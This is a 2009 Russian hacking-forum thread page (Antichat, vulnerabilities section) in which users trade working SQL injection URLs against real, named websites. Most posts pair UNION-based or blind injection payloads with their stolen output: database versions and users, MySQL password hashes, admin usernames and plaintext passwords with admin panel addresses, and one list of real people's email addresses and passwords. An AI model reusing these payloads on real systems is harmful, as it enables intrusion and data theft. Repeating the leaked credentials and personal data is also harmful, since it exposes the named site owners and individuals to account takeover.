ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8001  
Старый 24.02.2009, 23:51
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.rinkfinder.com/arenas/view_arena.asp?ID=1687687368768762+union+select+1, 2,3,concat_ws(0x3a,version(),user(),database()),5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 7,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73, 74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90 ,91,92,93,94,95,96,97,98,99,100,101,102,103,104,10 5,106,107,108,109,110,111,112,113,114,115,116,117, 118,119,120,121,122,123,124,125,126,127,128,129,13 0,131,132,133,134,135,136,137,138--

Database Version: 5.0.45
Database name: rinkfinder
User name: testuser@209.240.73.210


Цитата:
http://www.rinkfinder.com/arenas/view_arena.asp?ID=1687687368768762+union+select+1, 2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61, 62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78 ,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,9 5,96,97,98,99,100,101,102,103,104,105,106,107,108, 109,110,111,112,113,114,115,116,117,118,119,120,12 1,122,123,124,125,126,127,128,129,130,131,132,133, 134,135,136,137,138+from+mysql.user+limit+0,1--
root : 304c680c7bea9e43 хэш MySQL : 304c680c7bea9e43 : trainwreck


На Винде 2003

2ip показал 161 сайт.




Цитата:
http://www.lautrecampagne.org/article.php?id=0137986542+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,concat_ws(0x3a,version(),user() ,database()),15,16,17,18,19,20,21,22,23,24--


Database Version: 5.0.68-log
Database name: lautrecafmyBd
User name: lautrecafmyBd@10.0.85.131


Цитата:
http://www.lautrecampagne.org/article.php?id=0137986542+UNION+SELECT+1,2,3,4,5,6 ,7,8,9,10,11,12,13,CONCAT(0x3a,(SELECT+CONCAT(user Email,0x3a,userMdp)+FROM+lautrecafmyBd.tacusers+LI MIT+1,1),0x3a),15,16,17,18,19,20,21,22,23,24--

:f.bourgade@free.fr :fb
assant.ordinaire@wanadoo.fr :jmoqtw56
:le_strat@eaudeparis.fr :bghlnrsv
:immanuel.wallerstein@yale.edu :cgkx3578
:julie@avenuebprod.com :df7frt2p
:gdebregeas@gmail.com :cefhkrs7
:susangeorge@free.fr :blostxz1
:chemgen@ext.jussieu.fr :deguvz17
:etienne.balibar@wanadoo.fr:uytz9lh3
:bouveres@noos.fr :ghuvyz37
:mgaillenikodimov@yahoo.fr :eqrvxz56




ГРУППЫ КОДЕРОВ НА ПХП-))


PageRank = 6


Цитата:
http://www.phpusergroups.org/groups.phtml?id=179879865398072+union+select+conca t_ws(0x3a,version(),user(),database()),2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17--&menu=groups

Database Version: 5.0.18-standard
Database name: phpuserg
User name: phpuserg@localhost

Последний раз редактировалось spherics; 25.02.2009 в 00:40..
 
Ответить с цитированием

  #8002  
Старый 25.02.2009, 00:59
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://dr-gng.dp.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf),2,3,4,concat(0x3c623e7573657228293a646174616261736528293a76657273696f6e28293a3c2f623e203c693e,user(),0x3a,database(),0x3a,version())+from+rkh8t5po
user():database():version()
guZsp4@localhost:gEm1Zn:4.1.22-log

Admin Account
Код:
admin:Vpa4M9ql
http://www.gemeni.com.ua/admin
---------------------------------------------------------------------------------------
Код:
http://dr-gng.dp.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf),2,3,4,concat(0x3c623e7573657228293a646174616261736528293a76657273696f6e28293a3c2f623e203c693e,user(),0x3a,database(),0x3a,version())+from+rkh8t5po
user():database():version()
drgngdpua_dGu3@localhost:drgngdpua_dgB9:5.0.67-community

Admin Account
Код:
admin:s6Mzp1sB8Ag4Jq
http://dr-gng.dp.ua/admin
---------------------------------------------------------------------------------------
Код:
http://www.med-tech.kiev.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf),2,3,4,concat(0x3c623e7573657228293a646174616261736528293a76657273696f6e28293a3c2f623e203c693e,user(),0x3a,database(),0x3a,version())+from+rkh8t5po
user():database():version()
culkin_mtuK4c1@localhost:culkin_mtchZ5d:5.0.67-community

Admin Account
Код:
admin:f7maLp3V6mZzt6fpsR
http://med-tech.kiev.ua/admin
---------------------------------------------------------------------------------------
Код:
http://forex-4-all.ru/ndex.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf),2,3,4,concat(0x3c623e7573657228293a646174616261736528293a76657273696f6e28293a3c2f623e203c693e,user(),0x3a,database(),0x3a,version())+from+rkh8t5po
user():database():version()
dzubaa_FpR5U@localhost:dzubaa_frX4fs:4.1.22-standard

Admin Account
Код:
admin:jp4Clz9S
http://forex-4-all.ru/admin
---------------------------------------------------------------------------------------
Код:
http://scotland.org.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf),2,3,4,concat(0x3c623e7573657228293a646174616261736528293a76657273696f6e28293a3c2f623e203c693e,user(),0x3a,database(),0x3a,version())+from+rkh8t5po
user():database():version()
qwertyadm1_rma6l@localhost:qwertyadm1_scOtL:5.0.67-community

Admin Account
Код:
admin:paLz5C9qm1
http://scotland.org.ua/admin
---------------------------------------------------------------------------------------
Код:
http://russia-forex.ru/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf),2,3,4,concat(0x3c623e7573657228293a646174616261736528293a76657273696f6e28293a3c2f623e203c693e,user(),0x3a,database(),0x3a,version())+from+rkh8t5po
user():database():version()
dzubaa_fRux0F@localhost:dzubaa_RfuL4m:4.1.22-standard

Admin Account
Код:
admin:iKd8B1kzf6
http://russia-forex.ru/admin
---------------------------------------------------------------------------------------
Код:
http://www.cooler.dp.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf),2,3,4,concat(0x3c623e7573657228293a646174616261736528293a76657273696f6e28293a3c2f623e203c693e,user(),0x3a,database(),0x3a,version())+from+rkh8t5po
user():database():version()
drgngdpua_Cu2L6@localhost:drgngdpua_C2ol3a:5.0.67-community

Admin Account
Код:
admin:PV4mAG3Ck
http://www.cooler.dp.ua/admin
---------------------------------------------------------------------------------------
Код:
http://www.bfstimul.dp.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf),2,3,4,concat(0x3c623e7573657228293a646174616261736528293a76657273696f6e28293a3c2f623e203c693e,user(),0x3a,database(),0x3a,version())+from+rkh8t5po
user():database():version()
drgngdpua_bfU5v@localhost:drgngdpua_bfDn4:5.0.67-community

Admin Account
Код:
admin:f5Jma2KpX
http://www.bfstimul.dp.ua/admin
 
Ответить с цитированием

  #8003  
Старый 25.02.2009, 07:20
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.supercalculatoare.com/compara.php?ID=-5730+union+select+1,2,3,version(),user(),6,7,8,9,0 ,11,12,13,14,15--



Database Version: 5.0.67-community-log
Database Name: super
User name: super@localhost
 
Ответить с цитированием

  #8004  
Старый 25.02.2009, 12:44
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
http://www.museum.upenn.edu/new/events/calitem.php?which=-1801+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24+from+admin/*
Version: 4.1.10-nt
Username: upenn@localhost
Dbname: upenn
 
Ответить с цитированием

  #8005  
Старый 25.02.2009, 12:54
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Код:
http://www.greywolves.co.uk/page.php?pid=13%20union%20select%201,2,concat_ws(0x3a,user,password),4,5,6,7,8,9,10%20from%20mysql.user--
mysql.user
truststfc:6d6e0e253af1fe4f
file_priv=N =(
 
Ответить с цитированием

  #8006  
Старый 25.02.2009, 13:38
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

www.agenpulsa.info PageRank 4
PHP код:
http://www.agenpulsa.info/mod.php?mod=publisher&op=viewarticle&artid=-1+union+select+1,2,3,group_concat(concat_ws(0x3A,uname,pass)+SEPARATOR+0x3c62723e),5,6,7,8,9,10,11+from+users-- 
www.alsofwah.or.id PageRank 5
PHP код:
http://www.alsofwah.or.id/cetakberita.php?id=-78++union+select+1,concat_ws(0x3A,user,password,email),3,4,5,6,7,8+from+u2842_alsofwah.user+--+ 

Последний раз редактировалось AkyHa_MaTaTa; 25.02.2009 в 14:22..
 
Ответить с цитированием

  #8007  
Старый 25.02.2009, 17:16
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.mfcspartak-mo.ru/index.php?id=-1+union+select+1,2,concat_ ws(0x3a,version( ),database(),user()),4,5,6,7--
Database Version : 4.0.27-max-log
Database name : mfcspart_book
User name : mfcspart_book@v55.valuehost.ru


--------------------------------------------------------#

Код:
http://www.armfootball.com/index.php?Page=News&Lang=Rus&ID=-1+union+select+1,2,concat_ ws(0x3a,version(),database(),user()),4,5--
Database Version : 5.0.67-community
Database name : nareco_armfootball
User name : nareco_root@localhost
 
Ответить с цитированием

  #8008  
Старый 25.02.2009, 23:22
Аватар для ph1l1ster
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию

Код:
http://www.idibaps.ub.edu/eng/equipo.php?anyo=2001&arid=2&id=-13+union+select+1,2,3,concat(user(),0x3a,version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71/*

http://profusion.bu.edu/techlab/modules/references/view_author.php?id=-109+union+select+1,concat(user,0x3a,password),3,0x776861636b,5,6,7,8,9,10+from+mysql.user

http://www.housing.wisc.edu/resnet/news/story.php?id=-109+union+select+1,2,3,4,5,concat(user,0x3a,password),7,8,9,10+from+mysql.user+limit+0,1

http://dvaction.northwestern.edu/parentdetail.php?id=109+AND+ascii(lower(substring(version(),1,1)))=53

http://www.ece.virginia.edu/profiles.php?ID=-109+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21

http://depts.washington.edu/mcb/facultyinfo.php?id=-109+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
 
Ответить с цитированием

  #8009  
Старый 26.02.2009, 01:37
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

ТИЦ : 1100
Код:
http://www.tourtrans.ru/index.php?page=news&id=-1+union+select+1,2,concat _ws(0x3a, version(),database(),user ())--
Database Version : 4.0.27-log
Database name : tteurope
User name : tteurope@zvm21.host.ru


---------------------------------------------------#

PR: 5
тИЦ: 950


Код:
http://www.solvex.ru/agents/?uid=-1+union+select+1,2,3,4,concat _ws(0x3a,version(),database(),use r()),6,7,8,9,10,11,12,13,14,15,16,17--
Database Version : 5.0.67-log
Database name : solvex-travel_ru
User name : solvex-travel_ru@zvm23.host.ru


Код:
http://www.solvex.ru/agents/?uid=-1+union+select+1,2,3,4,table _name,6,7,8,9,10,11,12,13,14,15,16,17+from+ information_schema.tables+limit+0,1--
50 столбцов, но юзверей я что-то так и не нашел (((

Последний раз редактировалось f1ng3r; 26.02.2009 в 03:04.. Причина: add
 
Ответить с цитированием

  #8010  
Старый 26.02.2009, 03:04
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.system-plus.ro/noutati-details.php?id=72+AND+ASCII(SUBSTRING((select+vers ion()),1,1))=x/*

x=52,46,49,46,50,50,45,115,116,97,110,100,97,114,1 00



http://www.system-plus.ro/noutati-details.php?id=72+AND+ASCII(SUBSTRING((select+data base()),1,1))=x/*

x=115,121,115,116,101,109,112,95,115,112


http://www.system-plus.ro/noutati-details.php?id=72+AND+ASCII(SUBSTRING((select+user ()),1,1))=x/*


x=115,121,115,116,101,109,112,95,115,112,64,108,11 1,99,97,108,104,111,115,116


Version : 4.1.22-standard

Database : systemp_sp
User : systemp_sp@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ